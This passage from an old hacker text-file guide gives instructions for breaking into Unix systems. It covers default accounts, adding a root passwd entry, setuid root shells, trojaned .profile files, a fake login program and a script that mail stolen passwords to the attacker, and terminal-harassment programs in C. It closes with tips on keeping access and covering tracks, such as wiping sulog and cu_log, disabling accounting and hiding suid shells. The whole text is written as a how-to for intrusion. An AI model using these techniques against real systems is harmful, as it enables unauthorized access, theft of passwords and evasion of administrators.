.. Some unixes have an account open named "test". This is also a default, but surprisingly enough, it is sometimes left open. It is good to try to use it. Remember, brainstorming is the key to a unix that has no apparent defaults open. Think of things that may go along with the Unix. type in stuff like "info", "password", "dial", "bbs" and other things that may pertain to the system. "att" is present on some machines also. ONCE INSIDE -- SPECIAL FILES ---------------------------- There are several files that are very important to the UNIX environment. They are as follows: /etc/passwd - This is probably the most important file on a Unix. Why? well, basically, it holds the valid usernames/passwords. This is important since only those listed in the passwd file can login, and even then some can't (will explain). The format for the passwordfile is this: username:password:UserID:GroupID:description(or real name):homedir:shell Here are two sample entries: sirhack:89fGc%?7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/sh demo::101:100:Test Account:/usr/demo:/usr/sh In the first line, sirhack is a valid user. The second field, however, is supposed to be a password, right? Well, it is, but it's encrypted with the DES encryption standard. the part that says "&a,Ty" may include a date after the comma (Ty) that tells unix when the password expires. Yes, the date is encrypted into two alphanumeric characters (Ty). In the Second example, the demo account has no password. so at Login, you could type in: login: demo UNIX system V (c)1984 AT&T .. .. But with sirhack, you'd have to enter a password. Now, the password file is great, since a lot of times, you;ll be able to browse through it to look for unpassworded accounts. Remember that some accounts can be restricted from logging in, as such: bin:*:2:2:binaccount:/bin:/bin/sh The '*' means you won't be able to login with it. Your only hope would be to run an SUID shell (explained later). A note about the DES encryption: each unix makes its own unique "keyword" to base encryption off of. Most of the time its just random letters and numbers. Its chosen at installation time by the operating system. Now, decrypting DES encrypted things ain't easy. Its pretty much impossible. Especially decrypting the password file (decrypting the password field within the password file to be exact). Always beware a hacker who says he decrypted a password file. He's full of shit. Passwords are never decrypted on unix, but rather, a system call is made to a function called "crypt" from within the C language, and the string you enter as the password gets encrypted, and compared to the encrypted password. If they match, you're in. Now, there are password hackers, but they donot decrypt the password file, but rather, encrypt words from a dictionary and try them against every account (by crypting/comparing) until it finds a match (later on!). Remember, few, if none, have decrypted the password file successfuly. /etc/group - This file contains The valid groups. The group file is usually defined as this: groupname:password:groupid:users in group Once again, passwords are encrypted here too. If you see a blank in the password entry you can become part of that group by using the utility "newgrp". Now, there are some cases in which even groups with no password will allow only certain users to be assigned to the group via the newgrp command. Usually, if the last field is left blank, that means any user can use newgrp to get that group's access. Otherwise, only the users specified in the last field can enter the group via newgrp. Newgrp is just a program that will change your group current group id you are logged on under to the one you specify. The syntax for it is: newgrp groupname Now, if you find a group un passworded, and use newgrp to enter it, and it asks for a password, you are not allowed to use the group. I will explain this further in The "SU & Newgrp" section. /etc/hosts - this file contains a list of hosts it is connected to thru a hardware network (like an x.25 link or something), or sometimes just thru UUCP. This is a good file when you are hacking a large network, since it tells you systems you can use with rsh (Remote Shell, not restricted shell), rlogin, and telnet, as well as other ethernet/x.25 link programs. /usr/adm/sulog (or su_log) - the file sulog (or su_log) may be found in Several directories, but it is usually in /usr/adm. This file is what it sounds like. Its a log file, for the program SU. What it is for is to keep a record of who uses SU and when. whenever you use SU, your best bet would be to edit this file if possible, and I'll tell you how and why in the section about using "su". /usr/adm/loginlog or /usr/adm/acct/loginlog - This is a log file, keeping track of the logins. Its purpose is merely for accounting and "security review". Really, sometimes this file is never found, since a lot of systems keep the logging off. /usr/adm/errlog or errlog - This is the error log. It could be located anywhere. It keeps track of all serious and even not so serious errors. Usually, it will contain an error code, then a situation. the error code can be from 1-10, the higher the number, the worse the error. Error code 6 is usually used when you try to hack. "login" logs your attempt in errlog with error code 6. Error code 10 means, in a nutshell, "SYSTEM CRASH". /usr/adm/culog - This file contains entries that tell when you used cu, where you called and so forth. Another security thing. /usr/mail/ - this is where the program "mail" stores its mail. to read a particular mailbox, so they are called, you must be that user, in the user group "mail" or root. each mailbox is just a name. for instance, if my login was "sirhack" my mail file would usually be: /usr/mail/sirhack /usr/lib/cron/crontabs - This contains the instructions for cron, usually. Will get into this later. /etc/shadow - A "shadowed" password file. Will talk about this later. -- The BIN account -- Well, right now, I'd like to take a moment to talk about the account "bin". While it is only a user level account, it is very powerful. It is the owner of most of the files, and on most systems, it owns /etc/passwd, THE most important file on a unix. See, the bin account owns most of the "bin" (binary) files, as well as others used by the binary files, such as login. Now, knowing what you know about file permissions, if bin owns the passwd file, you can edit passwd and add a root entry for yourself. You could do this via the edit command: $ ed passwd 10999 [The size of passwd varies] * a sirhak::0:0:Mr. Hackalot:/:/bin/sh {control-d} * w * q $ Then, you could say: exec login, then you could login as sirhack, and you'd be root. /\/\/\/\/\/\/\/\/ Hacking.......... /\/\/\/\/\/\/\/\/ -------------- Account Adding -------------- There are other programs that will add users to the system, instead of ed. But most of these programs will NOT allow a root level user to be added, or anything less than a UID of 100. One of these programs is named "adduser". Now, the reason I have stuck this little section in, is for those who want to use a unix for something useful. Say you want a "mailing address". If the unix has uucp on it, or is a big college, chances are, it will do mail transfers. You'll have to test the unix by trying to send mail to a friend somewhere, or just mailing yourself. If the mailer is identified as "smail" when you mail yourself (the program name will be imbedded in the message) that probably means that the system will send out UUCP mail. This is a good way to keep in contact with people. Now, this is why you'd want a semi-permanent account. The way to achieve this is by adding an account similar to those already on the system. If all the user-level accounts (UID >= 100) are three letter abbriviations, say "btc" for Bill The Cat, or "brs" for bill ryan smith, add an account via adduser, and make a name like sally jane marshall or something (they don't expect hackers to put in female names) and have the account named sjm. See, in the account description (like Mr. Hackalot above), that is where the real name is usually stored. So, sjm might look like this: sjm::101:50:Sally Jane Marshall:/usr/sjm:/bin/sh Of course, you will password protect this account, right? Also, group id's don't have to be above 100, but you must put the account into one that exists. Now, once you login with this account, the first thing you'd want to do is execute "passwd" to set a password up. If you don't, chances are someone else 'll do it for you (Then you'll be SOL). ------------------- Set The User ID ------------------- This is porbably one of the most used schemes. Setting up an "UID- Shell". What does this mean? Well, it basically means you are going to set the user-bit on a program. The program most commonly used is a shell (csh,sh, ksh, etc). Why? Think about it: You'll have access to whatever the owner of the file does. A UID shell sets the user-ID of the person who executes it to the owner of the program. So if root owns a uid shell, then you become root when you run it. This is an alternate way to become root. Say you get in and modify the passwd file and make a root level account unpassworded, so you can drop in. Of course, you almost HAVE to get rid of that account or else it WILL be noticed eventually. So, what you would do is set up a regular user account for yourself, then, make a uid shell. Usually you would use /bin/sh to do it. After adding the regular user to the passwd file, and setting up his home directory, you could do something like this: (assume you set up the account: shk) # cp /bin/sh /usr/shk/runme # chmod a+s /usr/shk/runme Thats all there would be to it. When you logged in as shk, you could just type in: $ runme # See? You'd then be root. Here is a thing to do: $ id uid=104(shk) gid=50(user) $ runme # id uid=104(shk) gid=50(user) euid=0(root) # The euid is the "effective" user ID. UID-shells only set the effective userid, not the real user-id. But, the effective user id over-rides the real user id. Now, you can, if you wanted to just be annoying, make the utilities suid to root. What do I mean? For instance, make 'ls' a root 'shell'. : # chmod a+s /bin/ls # exit $ ls -l /usr/fred .. ...... etc crap Ls would then be able to pry into ANY directory. If you did the same to "cat" you could view any file. If you did it to rm, you could delete any file. If you did it to 'ed', you could edit any-file (nifty!), anywhere on the system (usually). How do I get root? ------------------ Good question indeed. To make a program set the user-id shell to root, you have to be root, unless you're lucky. What do I mean? Well, say you find a program that sets the user-id to root. If you have access to write to that file, guess what? you can copy over it, but keep the uid bit set. So, say you see that the program chsh is setting the user id too root. You can copy /bin/sh over it. $ ls -l rwsrwsrws root other 10999 Jan 4 chsh $ cp /bin/sh chsh $ chsh # See? That is just one way. There are others, which I will now talk about. More on setting the UID ----------------------- Now, the generic form for making a program set the User-ID bit is to use this command: chmod a+s file Where 'file' is a valid existing file. Now, only those who own the file can set the user ID bit. Remember, anything YOU create, YOU own, so if you copy th /bin/sh, the one you are logged in as owns it, or IF the UID is set to something else, the New UID owns the file. This brings me to BAD file permissions. II. HACKING : Bad Directory Permissions Now, what do I mean for bad directory permissions? Well, look for files that YOU can write to, and above all, DIRECTORIES you can write to. If you have write permissions on a file, you can modify it. Now, this comes in handy when wanting to steal someone's access. If you can write to a user's .profile, you are in business. You can have that user's .profile create a suid shell for you to run when You next logon after the user. If the .profile is writable to you, you can do this: $ ed .profile [some number will be here] ? a cp /bin/sh .runme chmod a+x .runme chmod a+s .runme (control-d) ? w [new filesize will be shown] ? q $ Now, when the user next logs on, the .profile will create .runme which will set your ID to the user whose .profile you changed. Ideally, you'll go back in and zap those lines after the suid is created, and you'll create a suid somewhere else, and delete the one in his dir. The .runme will not appear in the user's REGULAR directory list, it will only show up if he does "ls -a" (or ls with a -a combination), because, the '.' makes a file hidden. The above was a TROJAN HORSE, which is one of the most widely used/abused method of gaining more power on a unix. The above could be done in C via the system() command, or by just plain using open(), chmod(), and the like. * Remember to check and see if the root user's profile is writeable * * it is located at /.profile (usually) * The BEST thing that could happen is to find a user's directory writeable by you. Why? well, you could replace all the files in the directory with your own devious scripts, or C trojans. Even if a file is not writeable by you, you can still overwrite it by deleteing it. If you can read various files, such as the user's .profile, you can make a self deleting trojan as so: $ cp .profile temp.pro $ ed .profile 1234 ? a cp /bin/sh .runme chmod a+x .runme chmod a+s .runme mv temp.pro .profile (control-d) ? w [another number] ? q $ chown that_user temp.pro What happens is that you make a copy of the .profile before you change it. Then, you change the original. When he runs it, the steps are made, then the original version is placed over the current, so if the idiot looks in his .profile, he won't see anything out of the ordinary, except that he could notice in a long listing that the change date is very recent, but most users are not paranoid enough to do extensive checks on their files, except sysadm files (such as passwd). Now, remember, even though you can write to a dir, you may not be able to write to a file without deleting it. If you do not have write perms for that file, you'll have to delete it and write something in its place (put a file with the same name there). The most important thing to remember if you have to delete a .profile is to CHANGE the OWNER back after you construct a new one (hehe) for that user. He could easily notice that his .profile was changed and he'll know who did it. YES, you can change the owner to someone else besides yourself and the original owner (as to throw him off), but this is not wise as keeping access usually relies on the fact that they don't know you are around. You can easily change cron files if you can write to them. I'm not going to go into detail about cronfile formats here, just find the crontab files and modify them to create a shell somewhere as root every once in a while, and set the user-id. III. Trojan Horses on Detached terminals. Basically this: You can send garbage to a user's screen and mess him up bad enough to force a logoff, creating a detached account. Then you can execute a trojan horse off that terminal in place of login or something, so the next one who calls can hit the trojan horse. This USUALLY takes the form of a fake login and write the username/pw entererred to disk. Now, there are other trojan horses available for you to write. Now, don't go thinking about a virus, for they don't work unless ROOT runs them. Anyway, a common trjan would be a shell script to get the password, and mail it to you. Now, you can replace the code for the self deleting trojan with one saying something like: echo "login: \c" read lgin echo off (works on some systems) (if above not available...: stty -noecho) echo "Password:\c" read pw echo on echo "Login: $lgin - Pword: $pw" | mail you Now, the best way to use this is to put it in a seperate script file so it can be deleted as part of the self deleting trojan. A quick modification, removing the "login: " and leaving the password may have it look like SU, so you can get the root password. But make sure the program deletes itself. Here is a sample trojan login in C: #include /* Get the necessary defs.. */ main() { char *name[80]; char *pw[20]; FILE *strm; printf("login: "); gets(name); pw = getpass("Password:"); strm = fopen("/WhereEver/Whateverfile","a"); fprintf(strm,"User: (%s), PW [%s]\n",name,pw); fclose(strm); /* put some kind of error below... or something... */ printf("Bus Error - Core Dumped\n"); exit(1); } The program gets the login, and the password, and appends it to a file (/wherever/whateverfile), and creates the file if it can, and if its not there. That is just an example. Network Annoyances come later.  IV. Odd systems There may be systems you can log in to with no problem, and find some slack menu, database, or word processor as your shell, with no way to the command interpreter (sh, ksh, etc..). Don't give up here. Some systems will let you login as root, but give you a menu which will allow you to add an account. However, ones that do this usually have some purchased software package running, and the people who made the software KNOW that the people who bought it are idiots, and the thing will sometimes only allow you to add accounts with user-id 100 or greater, with their special menushell as a shell. You probably won't get to pick the shell, the program will probably stick one on the user you created which is very limiting. HOWEVER, sometimes you can edit accounts, and it will list accounts you can edit on the screen. HOWEVER, these programs usually only list those with UIDS > 100 so you don't edit the good accounts, however, they donot stop you from editing an account with a UID < 100. The "editing" usually only involves changing the password on the account. If an account has a * for a password, the standard passwd program which changes programs, will say no pw exists, and will ask you to enter one. (wallah! You have just freed an account for yourself. Usually bin and sys have a * for a password). If one exists you'll have to enter the old Password (I hope you know it!) for that account. Then, you are in the same boat as before. (BTW -- These wierd systems are usually Xenix/386, Xenix/286, or Altos/286) With word processors, usually you can select the load command, and when the word processor prompts for a file, you can select the passwd file, to look for open accounts, or at least valid ones to hack. An example would be the informix system. You can get a word processor with that such as Samna word, or something, and those Lamers will not protect against shit like that. Why? The Passwd file HAS to be readable by all for the most part, so each program can "stat" you. However, word processors could be made to restrict editing to a directory, or set of directories. Here is an example: $ id uid=100(sirhack) gid=100(users) $ sword (word processor comes up) (select LOAD A FILE) : /etc/passwd (you see: ) root:dkdjkgsf!!!:0:0:Sysop:/:/bin/sh sirhack:dld!k%%?%:100:100:Sir Hackalot:/usr/usr1/sirhack:/bin/sh datawiz::101:100:The Data Wizard:/usr/usr1/datawiz:/bin/sh ... Now I have found an account to take over! "datawiz" will get me in with no trouble, then I can change his password, which he will not like at all. Some systems leave "sysadm" unpassworded (stupid!), and now, Most versions of Unix, be it Xenix, Unix, BSD, or whatnot, they ship a sysadm shell which will menu drive all the important shit, even creating users, but you must have ansi or something. You can usually tell when you'll get a menu. Sometimes on UNIX SYSTEM V, when it says TERM = (termtype), and is waiting for you to press return or whatever, you will probably get a menu.. ack. V. Shadowed Password files Not much to say about this. all it is, is when every password field in the password file has an "x" or just a single character. What that does is screw you, becuase you cannot read the shadowed password file, only root can, and it contains all the passwords, so you will not know what accounts have no passwords, etc. There are a lot of other schemes for hacking unix, lots of others, from writing assembly code that modifies the PCB through self-changing code which the interrupt handler doesn't catch, and things like that. However, I do not want to give away everything, and this was not meant for advanced Unix Hackers, or atleast not the ones that are familiar with 68xxx, 80386 Unix assembly language or anything. Now I will Talk about Internet. --->>> InterNet <<<--- Why do I want to talk about InterNet? Well, because it is a prime example of a TCP/IP network, better known as a WAN (Wide-Area-Network). Now, mainly you will find BSD systems off of the Internet, or SunOS, for they are the most common. They may not be when System V, Rel 4.0, Version 2.0 comes out. Anyway, these BSDs/SunOSs like to make it easy to jump from one computer to another once you are logged in. What happens is EACH system has a "yello page password file". Better known as yppasswd. If you look in there, and see blank passwords you can use rsh, rlogin, etc.. to slip into that system. One system in particular I came across had a a yppasswd file where *300* users had blank passwords in the Yellow Pages. Once I got in on the "test" account, ALL I had to do was select who I wanted to be, and do: rlogin -l user (sometimes -n). Then it would log me onto the system I was already on, through TCP/IP. However, when you do this, remember that the yppasswd only pertains to the system you are on at the time. To find accounts, you could find the yppasswd file and do: % cat yppasswd | grep :: Or, if you can't find yppasswd.. % ypcat passwd | grep :: On ONE system (which will remain confidential), I found the DAEMON account left open in the yppasswd file. Not bad. Anyway, through one system on the internet, you can reach many. Just use rsh, or rlogin, and look in the file: /etc/hosts for valid sites which you can reach. If you get on to a system, and rlogin to somewhere else, and it asks for a password, that just means one of two things: A. Your account that you have hacked on the one computer is on the target computer as well. Try to use the same password (if any) you found the hacked account to have. If it is a default, then it is definitly on the other system, but good luck... B. rlogin/rsh passed your current username along to the remote system, so it was like typing in your login at a "login: " prompt. You may not exist on the other machine. Try "rlogin -l login_name", or rlogin -n name.. sometimes, you can execute "rwho" on another machine, and get a valid account. Some notes on Internet servers. There are "GATEWAYS" that you can get into that will allow access to MANY internet sites. They are mostly run off a modified GL/1 or GS/1. No big deal. They have help files. However, you can get a "privilged" access on them, which will give you CONTROL of the gateway.. You can shut it down, remove systems from the Internet, etc.. When you request to become privileged, it will ask for a password. There is a default. The default is "system". I have come across *5* gateways with the default password. Then again, DECNET has the same password, and I have come across 100+ of those with the default privileged password. CERT Sucks. a Gateway that led to APPLE.COM had the default password. Anyone could have removed apple.com from the internet. Be advised that there are many networks now that use TCP/IP.. Such as BARRNET, LANET, and many other University networks. --** Having Fun **-- Now, if nothing else, you should atleast have some fun. No, I do not mean go trashing hardrives, or unlinking directories to take up inodes, I mean play with online users. There are many things to do. Re-direct output to them is the biggie. Here is an example: $ who loozer tty1 sirhack tty2 $ banner You Suck >/dev/tty1 $ That sent the output to loozer. The TTY1 is where I/O is being performed to his terminal (usually a modem if it is a TTY). You can repetitiously banner him with a do while statement in shell, causing him to logoff. Or you can get sly, and just screw with him. Observe this C program: #include #include #include main(argc,argument) int argc; char *argument[]; { int handle; char *pstr,*olm[80]; char *devstr = "/dev/"; int acnt = 2; FILE *strm; pstr = ""; if (argc == 1) { printf("OL (OneLiner) Version 1.00 \n"); printf("By Sir Hackalot [PHAZE]\n"); printf("\nSyntax: ol tty message\n"); printf("Example: ol tty01 You suck\n"); exit(1); } printf("OL (OneLiner) Version 1.0\n"); printf("By Sir Hackalot [PHAZE]\n"); if (argc == 2) { strcpy(olm,""); ? printf("\nDummy! You forgot to Supply a ONE LINE MESSAGE\n"); printf("Enter one Here => "); gets(olm); } strcpy(pstr,""); strcat(pstr,devstr); strcat(pstr,argument[1]); printf("Sending to: [%s]\n",pstr); strm = fopen(pstr,"a"); if (strm == NULL) { printf("Error writing to: %s\n",pstr); printf("Cause: No Write Perms?\n"); exit(2); } if (argc == 2) { if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s): \n",logname()); fprintf(strm,"%s\n",olm); fclose(strm); printf("Message Sent.\n"); exit(0); } if (argc > 2) { if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s):\n",logname()); while (acnt <= argc - 1) { fprintf(strm,"%s ",argument[acnt]); acnt++; } fclose(strm); printf("Message sent!\n"); exit(0); } } What the above does is send one line of text to a device writeable by you in /dev. If you try it on a user named "sirhack" it will notify sirhack of what you are doing. You can supply an argument at the command line, or leave a blank message, then it will prompt for one. You MUST supply a Terminal. Also, if you want to use ?, or *, or (), or [], you must not supply a message at the command line, wait till it prompts you. Example: $ ol tty1 You Suck! OL (OneLiner) Version 1.00 by Sir Hackalot [PHAZE] Sending to: [/dev/tty1] Message Sent! $ Or.. $ ol tty1 OL (OneLiner) Version 1.00 by Sir Hackalot [PHAZE] Dummy! You Forgot to Supply a ONE LINE MESSAGE! Enter one here => Loozer! Logoff (NOW)!! ?G?G Sending to: [/dev/tty1] Message Sent! $ You can even use it to fake messages from root. Here is another: /* * Hose another user */ #include #include #include #include #include #include #include #include #define NMAX sizeof(ubuf.ut_name) struct utmp ubuf; struct termio oldmode, mode; struct utsname name; int yn; int loop = 0; char *realme[50] = "Unknown"; char *strcat(), *strcpy(), me[50] = "???", *him, *mytty, histty[32]; char *histtya, *ttyname(), *strrchr(), *getenv(); int signum[] = {SIGHUP, SIGINT, SIGQUIT, 0}, logcnt, eof(), timout(); FILE *tf; main(argc, argv) int argc; char *argv[]; { register FILE *uf; char c1, lastc; int goodtty = 0; long clock = time((long *) 0); struct tm *localtime(); struct tm *localclock = localtime( &clock ); struct stat stbuf; char psbuf[20], buf[80], window[20], junk[20]; ? FILE *pfp, *popen(); if (argc < 2) { printf("usage: hose user [ttyname]\n"); exit(1); } him = argv[1]; if (argc > 2) histtya = argv[2]; if ((uf = fopen("/etc/utmp", "r")) == NULL) { printf("cannot open /etc/utmp\n"); exit(1); } cuserid(me); if (me == NULL) { printf("Can't find your login name\n"); exit(1); } mytty = ttyname(2); if (mytty == NULL) { printf("Can't find your tty\n"); exit(1); } if (stat(mytty, &stbuf) < 0) { printf("Can't stat your tty -- This System is bogus.\n"); } if ((stbuf.st_mode&02) == 0) { printf("You have write permissions turned off (hehe!).\n"); } if (histtya) { if (!strncmp(histtya, "/dev/", 5)) histtya = strrchr(histtya, '/') + 1; strcpy(histty, "/dev/"); strcat(histty, histtya); } while (fread((char *)&ubuf, sizeof(ubuf), 1, uf) == 1) { if (ubuf.ut_name[0] == '\0') continue; if (!strncmp(ubuf.ut_name, him, NMAX)) { ? logcnt++; ? if (histty[0]==0) { strcpy(histty, "/dev/"); strcat(histty, ubuf.ut_line); } if (histtya) { if (!strcmp(ubuf.ut_line, histtya)) goodtty++; } } } fclose(uf); if (logcnt==0) { printf("%s not found! (Not logged in?)\n", him); exit(1); } if (histtya==0 && logcnt > 1) { printf("%s logged more than once\nwriting to %s\n", him, histty+5); } if (access(histty, 0) < 0) { printf("No such tty? [%s]\n",histty); ?? exit(1); ? } signal(SIGALRM, timout); alarm(5); if ((tf = fopen(histty, "w")) == NULL) goto perm; alarm(0); if (fstat(fileno(tf), &stbuf) < 0) goto perm; if (geteuid() != 0 && (stbuf.st_mode&02) == 0) goto perm; ioctl(0, TCGETA, &oldmode); /* save tty state */ ioctl(0, TCGETA, &mode); sigs(eof); uname(&name); if (strcmp(him,"YOURNAMEHERE") == 0) yn = 1; if (yn == 1 ) { fprintf(tf, "\r(%s attempted to HOSE You with NW)\r\n",me); fclose(tf); printf("Critical Error Handler: %s running conflicting process\n",him); exit(1); } fflush(tf); mode.c_cc[4] = 1; mode.c_cc[5] = 0; mode.c_lflag &= ~ICANON; ioctl(0, TCSETAW, &mode); lastc = '\n'; printf("Backspace / Spin Cursor set lose on: %s\n",him); while (loop == 0) { c1 = '\b'; write(fileno(tf),&c1,1); sleep(5); fprintf(tf,"\\\b|\b/\b-\b+\b"); fflush(tf); } perm: printf("Write Permissions denied!\n"); exit(1); } timout() { printf("Timeout opening their tty\n"); exit(1); } eof() { printf("Bye..\n"); ioctl(0, TCSETAW, &oldmode); exit(0); } ex() { register i; sigs(SIG_IGN); i = fork(); if (i < 0) { printf("Try again\n"); goto out; } if (i == 0) { sigs((int (*)())0); execl(getenv("SHELL")?getenv("SHELL"):"/bin/sh","sh","-t",0); exit(0); } while(wait((int *)NULL) != i) ; printf("!\n"); out: sigs(eof); } sigs(sig) int (*sig)(); { register i; for (i=0; signum[i]; i++) signal(signum[i], sig); } What the above is, is a modified version of the standard write command. What it does, is spin the cursor once, then backspace once over the screen of the user it is run on. All though, it does not physically affect input, the user thinks it does. therefore, he garbles input. The sleep(xx) can be changed to make the stuff happen more often, or less often. If you put your login name in the "YOURNAMEHERE" slot, it will protect you from getting hit by it, if someone off a Public access unix leeches the executable from your directory. You could make a shorter program that does almost the same thing, but you have to supply the terminal, observe: /* Backspace virus, by Sir Hackalot [Phaze] */ #include #include main(argc,argv) char *argv[]; int argc; { int x = 1; char *device = "/dev/"; FILE *histty; if (argc == 1) { printf("Bafoon. Supply a TTY.\n"); exit(1); } strcat(device,argv[1]); /* Make the filename /dev/tty.. */ histty = fopen(device,"a"); if (histty == NULL) { printf("Error opening/writing to tty. Check their perms.\n"); exit(1); } printf("BSV - Backspace virus, By Sir Hackalot.\n"); printf("The Sucker on %s is getting it!\n",device); while (x == 1) { fprintf(histty,"\b\b"); fflush(histty); sleep(5); } } Thats all there is to it. If you can write to their tty, you can use this on them. It sends two backspaces to them every approx. 5 seconds. You should run this program in the background. (&). Here is an example: $ who sirhack tty11 loozer tty12 $ bsv tty12& [1] 4566 BSV - Backspace virus, by Sir Hackalot The Sucker on /dev/tty12 is getting it! $ Now, it will keep "attacking" him, until he loggs of, or you kill the process (which was 4566 -- when you use &, it gives the pid [usually]). ** Note *** Keep in mind that MSDOS, and other OP systems use The CR/LF method to terminate a line. However, the LF terminates a line in Unix. you must STRIP CR's on an ascii upload if you want something you upload to an editor to work right. Else, you'll see a ?M at the end of every line. I know that sucks, but you just have to compensate for it. I have a number of other programs that annoy users, but that is enough to get your imagination going, provided you are a C programmer. You can annoy users other ways. One thing you can do is screw up the user's mailbox. The way to do this is to find a binary file (30k or bigger) on the system which YOU have access to read. then, do this: $ cat binary_file | mail loozer or $ mail loozer < binary file That usually will spilt into 2 messages or more. The 1st message will have a from line.. (from you ..), but the second WILL NOT! Since it does not, the mail reader will keep exiting and giving him an error message until it gets fixed.. The way to fix it is to go to the mail box that got hit with this trick (usually only the one who got hit (or root) and do this), and edit the file, and add a from line.. like >From username.. then it will be ok. You can screw the user by "cat"ing a binary to his tty. say Loozer is on tty12. You can say.. $ cat binary_file >/dev/tty12 $ It may pause for a while while it outputs it. If you want to resume what you were doing instantly, do: $ cat binary_file >/dev/tty12& [1] 4690 $ And he will probably logoff. You can send the output of anything to his terminal. Even what YOU do in shell. Like this: $ sh >/dev/tty12 $ You'll get your prompts, but you won't see the output of any commands, he will... $ ls $ banner Idiot! $ echo Dumbass! $ until you type in exit, or hit ctrl-d. There are many many things you can do. You can fake a "write" to someone and make them think it was from somewhere on the other side of hell. Be creative. When you are looking for things to do, look for holes, or try to get someone to run a trojan horse that makes a suid shell. If you get someone to run a trojan that does that, you can run the suid, and log their ass off by killing their mother PID. (kill -9 whatever). Or, you can lock them out by adding "kill -1 0" to their .profile. On the subject of holes, always look for BAD suid bits. On one system thought to be invincible I was able to read/modify everyone's mail, because I used a mailer that had both the GroupID set, and the UserID set. When I went to shell from it, the program instantly changed my Effective ID back to me, so I would not be able to do anything but my regular stuff. But it was not designed to change the GROUP ID back. The sysop had blundered there. SO when I did an ID I found my group to be "Mail". Mailfiles are readble/writeable by the user "mail", and the group "mail". I then set up a sgid (set group id) shell to change my group id to "mail" when I ran it, and scanned important mail, and it got me some good info. So, be on the look out for poor permissions. Also, after you gain access, you may want to keep it. Some tips on doing so is: 1. Don't give it out. If the sysadm sees that joeuser logged in 500 times in one night....then.... 2. Don't stay on for hours at a time. They can trace you then. Also they will know it is irregular to have joeuser on for 4 hours after work. 3. Don't trash the system. Don't erase important files, and don't hog inodes, or anything like that. Use the machine for a specific purpose (to leech source code, develop programs, an Email site). Dont be an asshole, and don't try to erase everything you can. 4. Don't screw with users constantly. Watch their processes and run what they run. It may get you good info (snoop!) 5. If you add an account, first look at the accounts already in there If you see a bunch of accounts that are just 3 letter abbrv.'s, then make yours so. If a bunch are "cln, dok, wed" or something, don't add one that is "joeuser", add one that is someone's full initials. 6. When you add an account, put a woman's name in for the description, if it fits (Meaning, if only companies log on to the unix, put a company name there). People do not suspect hackers to use women's names. They look for men's names. 7. Don't cost the Unix machine too much money. Ie.. don't abuse an outdial, or if it controls trunks, do not set up a bunch of dial outs. If there is a pad, don't use it unless you NEED it. 8. Don't use x.25 pads. Their usage is heavily logged. 9. Turn off acct logging (acct off) if you have the access to. Turn it on when you are done. 10. Remove any trojan horses you set up to give you access when you get access. 11. Do NOT change the MOTD file to say "I hacked this system" Just thought I'd tell you. Many MANY people do that, and lose access within 2 hours, if the unix is worth a spit. 12. Use good judgement. Cover your tracks. If you use su, clean up the sulog. 13. If you use cu, clean up the cu_log. 14. If you use the smtp bug (wizard/debug), set up a uid shell. 15. Hide all suid shells. Here's how: goto /usr (or any dir) do: # mkdir ".. " # cd ".. " # cp /bin/sh ".whatever" # chmod a+s ".whatever" The "" are NEEDED to get to the directory .. ! It will not show up in a listing, and it is hard as hell to get to by sysadms if you make 4 or 5 spaces in there (".. "), because all they will see in a directory FULL list will be .. and they won't be able to get there unless they use "" and know the spacing. "" is used when you want to do literals, or use a wildcard as part of a file name. 16. Don't hog cpu time with password hackers. They really don't work well. 17. Don't use too much disk space. If you archieve something to dl, dl it, then kill the archieve. 18. Basically -- COVER YOUR TRACKS. Some final notes: Now, I hear lots of rumors and stories like "It is getting harder to get into systems...". Wrong. (Yo Pheds! You reading this??). It IS true when you are dealing with WAN's, such as telenet, tyment, and the Internet, but not with local computers not on those networks. Here's the story: Over the past few years, many small companies have sprung up as VARs (Value Added Resellers) for Unix and Hardware, in order to ma